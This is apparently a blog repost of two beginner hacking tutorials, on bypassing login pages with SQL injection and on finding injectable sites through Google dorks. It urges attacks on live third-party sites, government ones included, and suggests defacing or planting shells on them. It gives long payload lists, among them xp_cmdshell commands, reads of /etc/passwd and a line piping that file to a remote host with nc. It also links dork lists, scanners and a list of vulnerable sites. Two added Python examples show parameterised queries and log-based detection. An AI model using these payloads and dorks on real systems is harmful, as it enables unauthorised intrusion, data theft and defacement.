Tuesday, 20 May 2014

Basic SQL injection techniques

Bypassing Login pages on websites using SQL injectable queries


Level: Beginners and Intermediate


Requirements: Patience and strategy
Alright, in this tutorial we'll be learning how to bypass login pages with the help of MySQL injection using login queries.
This is Chapter 2 of the MegaProject.
Please visit Chapter 1 if you haven't seen it yet.
Also, if you need some questions answered, you can find solutions on my FAQ thread:

What is SQL injection?

Answer: Basically, it's a technique where you inject SQL into a query that a website runs against its database, in order to extract information such as login details or user records, for either personal gain or random use.
There are many types of queries that can be injected in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is a basic SQL injection query that can be executed in a login page.
Example:
Code:
Username: admin
Password: ' or '1'='1
When you enter the password ' or '1'='1 on most websites, there's a chance you can gain access.
How does it happen? Look at the query the site runs when we submit those values:

PHP Code:
SELECT * FROM users
WHERE username = 'admin' AND password = '' or '1'='1'
In the password field, we inserted a quote ' first, which closes the string the site opened, followed by the condition or '1'='1.
The database evaluates the WHERE clause for every row, and because '1'='1' is always true the clause matches regardless of the real password, so the site has no reason to treat the login as incorrect.
However, some websites filter out these types of queries, so it's best to try different ones too. You can find some below.
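To see the bypass and its fix side by side, here is an added example in Python (not code from the original tutorial) using an in-memory SQLite table as a constructed stand-in for the site's database: the first login function concatenates the submitted values into the query exactly as in the PHP snippet above, the second binds them as parameters so the quote stays data.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the site's user table (assumption: a single admin row).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'example-secret')")
    return conn


def build_vulnerable_sql(username, password):
    # String concatenation: whatever the user types becomes part of the SQL text,
    # so a quote in the password closes the literal and the rest is parsed as SQL.
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    # Any returned row counts as a successful login; AND binds tighter than OR,
    # so "... OR '1'='1'" makes the WHERE clause true for every row.
    row = conn.execute(build_vulnerable_sql(username, password)).fetchone()
    return row is not None


def login_safe(conn, username, password):
    # Bound parameters: the driver sends the password as a value, never as SQL
    # syntax, so the WHERE clause compares it literally against the stored one.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print(build_vulnerable_sql("admin", payload))
    print("vulnerable login accepted:", login_vulnerable(db, "admin", payload))  # True
    print("parameterised login accepted:", login_safe(db, "admin", payload))    # False
```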
Now that you have an idea of how basic SQL injection queries work, let's try and put it to use, shall we?

Step1: Finding websites with Login Page

Alright, our basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass them. For this, we can use dorks.
If you don't know how to use dorks or have no idea about them, please visit my previous tutorial:
In this tutorial, we can use these dorks:

Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html
If you want to find more dorks when using this method, you can find them here:

Code:
http://pastebin.com/ZjxpivV3

Step2: Now Executing the query

Alright, now that you've found your target with a login page, let's play with it a bit.
So here's what you're gonna do:
The username will be admin, because most sites have admin data stored in their database.

Code:
Username: admin
Password: ' or 0=0 --

Didn't work? No worries, there's more to it than just a single query.
Here's a list of password payloads you can use to hopefully inject the site.

Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--

Note: Sometimes this is not the best way of hacking websites with SQL injection, but I guarantee you'll be a successful, patient SQL injector and get used to this method.

Step3: I LOGGED in, what to do now?!

Well, first off, if you did log in, then congrats on your first successful attempt at SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it.
Others will just shell it and have other uses such as rooting, web hosting etc.
If you would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon.
Now you might want to watch the video so that you'll get the idea of how I log in as an Administrator on an SQLi vulnerable website.


Extras:

Common Password Queries:

Code:
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

If the database version is greater than 5, then queries with UNION, GROUP BY, @@version, ORDER BY, BENCHMARK etc. can be executed.
Code:
1234' AND 1=0 UNION ALL SELECT 'admin'
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
@@version
select @@version
select @@servername
select @@microsoftversion
select * from master..sysservers
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
SELECT 1 -- comment
SELECT /*comment*/1
ORDER BY 1--
' union all select sum(columntofind) from users--
UNION ALL SELECT null
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
SELECT TOP n columns
select * from OPENROWSET('MSDASQL'
select * from OPENROWSET('SQLOLEDB'
masters..sysxlogins
sys.sql_logins
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT CHAR(0x66)
SELECT * FROM members
@@version
SELECT USER();
select host
SELECT 1;
SELECT /*comment*/1;
ORDER BY 1--
UNION ALL SELECT null
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema
SELECT grantee
limit 1
SELECT host
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(100
select benchmark( 500
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT ascii('A')
SELECT CONCAT('0x'
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0
SELECT 0x5045
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
SELECT IF(1=1
' UNION ALL SELECT LOAD_FILE('/etc/passwd') AND 'a'='a
union SELECT LOAD_FILE(0x2f6574632f706173737764)
load data infile 'c:/boot.ini' into table foo;
# SELECT ... INTO DUMPFILE
SELECT login || '-' || password FROM members
select versionnumber
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select * from syscat.tabauth;
select current server from sysibm.sysdummy1;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tdbauth where grantee = current user;
select name from sysibm.systables;
select name
SELECT schemaname FROM syscat.schemata;
SELECT foo FROM bar fetch first 1 rows only;
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1;
SELECT cast('123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
select current_user;
select session_user;
SELECT current_setting('data_directory');
select current_setting('log_connections');
select current_setting('log_statement');
select current_setting('port');
select current_setting('password_encryption');
select current_setting('krb_server_keyfile');
select current_setting('virtual_host');
select current_setting('port');
select current_setting('config_file');
select current_setting('hba_file');
select current_setting('data_directory');
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb'
select dbmsinfo('_version');
select dbmsinfo('session_user');
select dbmsinfo('system_user');
select dbmsinfo('database');
select dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');
select top 10 blah from table;
select first 10 blah from table;
select table_name
select relid
select column_name
select 1 union select 2;
select cast('123' as integer);
select @@version
select name from master..syslogins
select name from master..sysdatabases
convert(integer
waitfor delay '0:0:5'

A database version lower than 5, i.e. version 4, cannot accept version-5-style UNION queries.
Looking for a test or challenge?
Try Stewie's hack test: http://www.stewie390.info/hack_tests/lvl5/homepage.php
Here are some sites you can test on:

I tried injecting all of them and it worked, so it should work for you too
Good luck

End of Chapter 2
Upcoming Chapter 3:
Union Based/Normal SQL injection
Stay tuned for the upcoming tutorials
Spid3r

FIND VULNERABILITY USING DORKS




For Beginners

A method of finding websites vulnerable to SQL injection is using what we call "dorks".
Dorks: they are search criteria for which a search engine returns results matching your dork.
The process can be a little time consuming, but the outcome will be worth it once you learn how to use dorks.

For this tutorial, the search engine we'll be using is Google
Credits to those who are mentioned in this tutorial
Now I'll show you how to use dorks with the help of a video too.


Step1: Finding your dorks i.e. the criteria you'll be using
Dork List compiled by kobez-

Code:

http://pastebin.com/0FqmasC7


Dork List by Sidesipe-

Code:

http://pastebin.com/x1rtqktj


Dork List by .Newsletter'

Code:

http://pastebin.com/APxqavu9


For this tutorial, we'll be using this dork "inurl:index.php?id="


Step2: Making use of your Dorks with the help of Google

Here's what you do:
Go to http://www.google.com
Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
Now you'll find a whole lot of links in your results


Here's how you can speed up your process:
Your mouse should have a scroll wheel, right?
Hover over each link and click the scroll wheel so that it opens in a new tab. (Let's say you can open about 10 links at a time.)


Step3: Vulnerability approach

Now to see whether the website is vulnerable to SQL injection or not, we simply put a quote ' at the end of the URL.
So our site will look like this:

Code:
http://www.site.com/index.php?id=123'


Do the same thing with the websites you opened in your tabs and see if any of them are vulnerable.

If a website is vulnerable, the extra quote should make it return a database error!

Note: If you can't find any vulnerability after searching with this dork, you can always browse the dork lists I've mentioned above and use any of them until you find a website vulnerable to SQL injection.
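From the defender's side, the probes this step relies on (a quote appended to a numeric id, the login payloads listed earlier on this page) leave recognisable traces in web server access logs. Here is an added example, not part of the original tutorial, that scans constructed common-log-format lines for such parameter values; the log lines, IP addresses and rule names are all made up for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines in common log format (not from any real server).
# Line 2 is the "append a quote" probe answered by a 500; line 4 carries a login payload.
SAMPLE_LOG = """\
10.0.0.5 - - [20/May/2014:10:01:02 +0000] "GET /index.php?id=123 HTTP/1.1" 200 512
10.0.0.5 - - [20/May/2014:10:01:09 +0000] "GET /index.php?id=123' HTTP/1.1" 500 231
10.0.0.7 - - [20/May/2014:10:02:15 +0000] "GET /search.php?q=rock+%27n%27+roll HTTP/1.1" 200 4021
10.0.0.9 - - [20/May/2014:10:03:40 +0000] "GET /login.php?user=admin&pass=%27+or+%271%27%3D%271 HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule names a probe pattern from the tutorial and a regex applied to one decoded parameter value.
PROBE_RULES = [
    ("quote appended to numeric id", re.compile(r"^\d+'$")),
    ("boolean tautology", re.compile(r"\bor\b\s*['\"(]*\s*\w+['\"]?\s*=\s*['\"]?\w+", re.I)),
    ("SQL comment terminator", re.compile(r"(--|#|/\*)\s*$")),
]


def classify_value(value):
    """Return the names of every rule the decoded parameter value matches (empty list if benign)."""
    return [name for name, rx in PROBE_RULES if rx.search(value)]


def find_probes(log_text):
    """Parse each log line, decode its query string and report parameters that look like probes."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m.group("target")).query
        # parse_qsl decodes %xx and '+'; keep_blank_values so empty parameters are still examined
        for param, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                findings.append({"ip": m.group("ip"), "param": param, "value": value,
                                 "reasons": reasons, "status": int(m.group("status"))})
    return findings


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```

A 500 response paired with a quote-terminated parameter is the server-side view of the "it should return an error" check above, so the status code is worth alerting on alongside the pattern match.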

Here's a video demonstration on how to use Dorks:

Extra Notes: Hunting for specific websites with specific domains

Ever want to hack a government website, or an organization website?
It's simple. All you have to do is improvise your dorks.
First off, here are some common domains:

Code:
.gov = Government websites
.edu = Educational websites
.org = Organizational websites
.com = Commercial websites
.info = Informative websites
.net = Networking websites (similar to .com)

Alright, now you know some specific domains, let's add them to our dork, shall we?
Follow this formula-like dork:

Code:
"inurl:."domain"/"dorks" "

So you would normally understand it like this:
"inurl" = input URL
"domain" = your desired domain ex. .gov
"dorks" = your dork of your choice
Now for an example, let's say you want to hack government websites.
Here's how it'll look:

Code:
"inurl:.gov/index.php?id="

Once you search that up, you'll find a lot of government websites in your results.

Changing "inurl" and using another one
Yes, you can change that too.
Google has a lot of search operators you can use.
Some of them are below; you can swap "inurl" for any of them to make another dork.

Code:
intitle:
intext:
define:
site:
info:
link:

Credits to Real Steel for bringing this up.
Choose any of them and make another.
Example: "intext:.edu/gallery?id="
More information about those here: http://www.hackforums.net/showthread.php?tid=2033496


Some Dork Scanners you can use to help you speed up the process

Scanner by moveax
http://www.hackforums.net/showthread.php?tid=1985016

Scanner by p0iz0ner
http://www.hackforums.net/showthread.php...SQL+poizon

Scanner by kript0x
http://www.hackforums.net/showthread.php...rk+scanner

If you're too lazy to use dorks to find vulnerable websites, you can use a ready-made list right here:

Vulnerable List by Dyme:
http://pastebin.com/kVMYX0Eh

End of Chapter 1
Upcoming chapters:
Chapter 2 - Basic MySQL injection using "Login" Queries
Please stay tuned with my tutorials, and I hope you enjoyed this chapter
Spid3r